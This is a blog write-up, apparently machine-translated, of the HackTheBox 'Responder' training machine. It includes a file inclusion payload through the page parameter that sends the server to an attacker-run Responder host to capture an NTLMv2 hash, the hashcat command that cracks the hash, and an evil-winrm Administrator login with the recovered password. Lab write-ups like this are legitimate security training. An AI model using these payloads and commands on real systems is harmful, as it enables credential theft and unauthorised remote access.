Virts

Virts

Virts's Blog ❤️
telegram
github
email
steam
douban
HomeArchives

HackTheBox [Responder] WriteUp

18
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The content describes a penetration testing exercise on the HackTheBox platform, focusing on arbitrary file inclusion vulnerabilities. After accessing the target IP and configuring DNS to resolve the domain, the user discovers an information leak through a script. By analyzing the source code, they identify potential file inclusion vulnerabilities and successfully exploit them to include a remote file and capture an NTLM hash using the Responder tool. They then use hashcat with the rockyou wordlist to crack the NTLMv2 hash, revealing the password "badminton." The user scans for open ports and finds WinRM on port 5985. After installing the necessary Ruby environment and the evil-winrm tool, they log into the target server using the cracked credentials and retrieve the flag from the specified file location.

image

Arbitrary File Inclusion#

The first half mainly involves answering questions, which are relatively simple. After that, configuring the tools becomes a bit troublesome.

First, directly access IP port 80, and you will find a redirection:

virts@Virts-MacMini-M4 ~> curl 10.129.83.22
<meta http-equiv="refresh" content="0;url=http://unika.htb/">

However, the domain unika.htb is not configured for resolution. So you need to modify the hosts file or configure DNS. Using Surge directly is quite convenient; once configured, you can access the website smoothly.

image
Scanning the directory reveals a piece of information leakage that is not very useful: http://unika.htb/cgi-bin/printenv.pl, which leaks some configuration information.

image

Checking the homepage source code reveals two tags like this:

<a href="/index.php?page=french.html">FR</a>
<a href="/index.php?page=german.html">DE</a>

So there may be arbitrary file inclusion and remote file inclusion. Using the configuration information found earlier, test: http://unika.htb/index.php?page=C:/xampp/cgi-bin/printenv.pl, and it successfully includes the file content.

image

Remote File Inclusion#

Next is something that hasn't been learned yet; directly obtaining the NTLM Hash through remote file inclusion.

You need to use the tool Responder, and the installation method is quite simple.

git clone https://github.com/lgandx/Responder.git
cd Responder
pip install -r requirements.txt

To start Responder, you need to specify an interface and IP; you can use the interface you are using for OpenVPN.

sudo python Responder.py -I utun4 -i 10.10.14.17

Then access http://unika.htb/index.php?page=//10.10.14.17/somefile to capture the NTLM Hash.

image
Prepare a rockyou to use hashcat to crack the NTLMv2 Hash.

hashcat -m 5600 test.hash ~/Hack/dict/Dictionary-Of-Pentesting/Password/rockyou.txt
hashcat -m 5600 test.hash ~/Hack/dict/Dictionary-Of-Pentesting/Password/rockyou.txt --show

image
The cracked password is badminton.

image
After scanning the target host, it was found that port 5985 is open, and the service on this port is WinRM, which is a remote control port, somewhat similar to Linux's SSH.

However, after searching for a long time, I couldn't find a suitable client on MacOS, so I had to install evil-winrm myself.

# Install Ruby package management tool
brew install rbenv ruby-build
# Install Ruby version 3.2.2
rbenv install 3.2.2
# Edit config.fish
vim ~/.config/fish/config.fish

Since I am using fish shell, I need to modify the fish shell configuration file and add the following content to the file:

# rbenv initialization
set -gx PATH $HOME/.rbenv/bin $PATH
# Initialize rbenv, fish version
status --is-interactive; and source (rbenv init -|psub)

After that, activate the configuration to install smoothly.

source ~/.config/fish/config.fish
rbenv global 3.2.2
gem install evil-winrm

Use evil-winrm to log into the target server.

evil-winrm -i 10.129.237.174 -u Administrator -p badminton

type "C:/Users/mike/Desktop/flag.txt"

image
Successfully obtained the Flag.

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.